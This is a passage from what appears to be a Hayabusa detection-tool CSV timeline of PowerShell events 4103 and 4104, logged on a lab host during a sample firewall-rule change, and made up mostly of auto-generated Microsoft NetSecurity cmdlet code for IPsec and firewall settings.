[System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.500 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.500 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.501 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.501 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.531 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$_",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.531 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query 